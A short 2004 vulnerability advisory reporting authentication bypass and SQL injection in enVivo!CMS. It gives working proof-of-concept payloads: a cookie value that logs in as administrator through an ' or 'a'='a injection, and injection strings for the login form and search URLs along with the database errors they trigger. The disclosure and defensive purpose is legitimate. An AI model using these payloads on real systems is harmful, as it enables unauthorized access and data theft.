Authentication Bypass and Multiple Sql injections in enVivo!CMS

Severity: High
Title: Authentication Bypass and Multiple Sql injections in enVivo!CMS
Date: 29/04/2004
Vendor: EnvivoSoft
Vendor Website: http://www.envivosoft.com/
Vendor Status: Vendor was notified but with no response yet.

Proof of Concept Exploits:

http://localhost/envivo101/envivocms/admin_login.asp
AUTHENTICATION BYPASS
By setting both the cookie username and password values to a' or 'a' = 'a
you can get access to the administrative account for example,
Cookiename:101
Cookievalue:remStayLoggedIn=True&remPassword=a%27+or+%27a%27+%3D+%27a&remUserName=a%27+or+%27a%27+%3D+%27a
Result: Hello enVivo!CMS Classic Administrator (admin) - Content Awaiting
Approval



http://localhost/envivo101/envivocms/admin_login.asp
SQL INJECTION
By setting the Username field to 'SQL_INJECTION you get,

Microsoft JET Database Engine error '80040e14'

Syntax error (missing operator) in query expression 'username = ''' AND
pword =
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855''.

/envivo101/envivocms/envivoadminAPI.asp, line 3077

http://localhost/envivo101/default.asp?act...9;SQL_INJECTION
SQL INJECTION

Microsoft JET Database Engine error '80040e14'

Syntax error (missing operator) in query expression '((articlespub.title
LIKE '%'SQL_INJECTION%' OR articlespub.abstract LIKE '%'SQL_INJECTION%' OR
articlespub.article LIKE '%'SQL_INJECTION%')) AND articlespub.releasetoweb
= 1 AND DATE() BETWEEN articlespub.startdate AND articlespub.enddate'.

/envivo101/envivocms/envivodisplayAPIfunctions.asp, line 788

http://localhost/envivo101/default.asp?act...='SQL_ERROR

Microsoft VBScript runtime error '800a000d'

Type mismatch: 'CLng'

/envivo101/envivocms/envivodisplayAPIfunctions.asp, line 42

Author:
These vulnerabilities have been found and released by Diabolic Crab